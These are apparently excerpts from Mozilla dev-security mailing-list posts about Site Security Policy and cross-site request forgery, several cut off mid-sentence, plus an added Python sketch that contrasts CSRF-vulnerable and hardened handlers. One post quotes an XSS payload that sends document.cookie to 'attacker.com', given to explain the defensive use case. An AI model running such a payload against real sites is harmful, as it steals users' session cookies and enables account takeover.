On Jul 11, 7:16 pm, bsterne <[EMAIL PROTECTED]> wrote:
> Perhaps I am misunderstanding this point. Are you suggesting that an
> ideal model wouldn't require that web developers do anything
> differently than they currently are? Site Security Policy is intended
> to be a belt-and-suspenders tool t
Messed around a bit and noticed that you can indeed post using a GET
request to Twitter. This looks to be somewhat XSRF protected with an
authorization token, so hopefully it's not dead simple to exploit.
However, the delete requests are just simple GETs of the form
http://twitter.com/status/destr
, I've seen forum software (my fuzzy memory says it was
also joomla, but it could have been phpbb or another package) that
allowed posting using a GET request (because there was no check to see
if the variables came in through post or GET -- php is awfully
friendly to this...).
Terri
___
dev-security mailing list
dev-security@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security
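As an added illustration (not code from the thread or from any of the packages named in it), a small Python sketch of why "no check to see if the variables came in through POST or GET" matters: a handler that merges GET and POST parameters, PHP $_REQUEST style, can be driven by a plain cross-site GET such as an image tag, while one that insists on POST plus a session-bound token cannot. The Request class, the store and the token value are constructed for the example.

```python
import hmac
from dataclasses import dataclass, field


@dataclass
class Request:
    """Constructed stand-in for an HTTP request (not a real framework)."""
    method: str
    query: dict = field(default_factory=dict)   # URL parameters (?id=...)
    form: dict = field(default_factory=dict)    # POST body fields
    session_token: str = ""                     # secret kept in the user's session


def merged_params(req):
    """PHP $_REQUEST style: GET and POST keys collapse into one dict,
    so the handler cannot tell which method actually carried them."""
    params = dict(req.query)
    params.update(req.form)
    return params


def delete_status_vulnerable(req, store):
    """Deletes 'id' from store regardless of method or token.
    Any third-party page the logged-in user views can trigger it."""
    sid = merged_params(req).get("id")
    if sid in store:
        store.remove(sid)
        return True
    return False


def delete_status_hardened(req, store):
    """Requires a POST body carrying the session-bound token."""
    if req.method != "POST":
        return False
    token = req.form.get("authenticity_token", "")
    if not token or not hmac.compare_digest(token, req.session_token):
        return False
    sid = req.form.get("id")
    if sid in store:
        store.remove(sid)
        return True
    return False


if __name__ == "__main__":
    # Constructed cross-site GET: the session cookie rides along, no token.
    forged = Request("GET", query={"id": "1"}, session_token="s3cr3t")
    print(delete_status_vulnerable(forged, {"1", "2"}))  # True: deleted
    print(delete_status_hardened(forged, {"1", "2"}))    # False: rejected
```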
Oh, I should probably also mention that we did an HTML conversion of
the tech report, so if anyone hates reading PDFs or just prefers HTML
(I know a surprising number of people who do), you can check it out
either on my university website:
http://www.scs.carleton.ca/~toda/doc/soma/
or my personal
On Jun 17, 9:25 am, Gervase Markham <[EMAIL PROTECTED]> wrote:
> What's the use case for locking down all page communications?
The traditional one: XSS cookie-stealing attacks like this:
var image = new Image();
image.src = 'http://attacker.com/log.php?cookie=' +
encodeURIComponent(document.cookie);
On Jun 12, 7:07 am, Gervase Markham <[EMAIL PROTECTED]> wrote:
> True. SSP in its current form is not a mechanism for locking down all
> page communications
Shouldn't it be? Site admins will already have to provide all the
necessary information in order to be SSP compliant, so it makes sense
to me
We've been doing some very similar work here in the Carleton Computer
Security Lab over the past year, and we put out a tech report in April
that I think would be really helpful:
http://www.scs.carleton.ca/research/tech_reports/index.php?Abstract=tr-08-07_0007&Year=2008
For one, we did a bunch of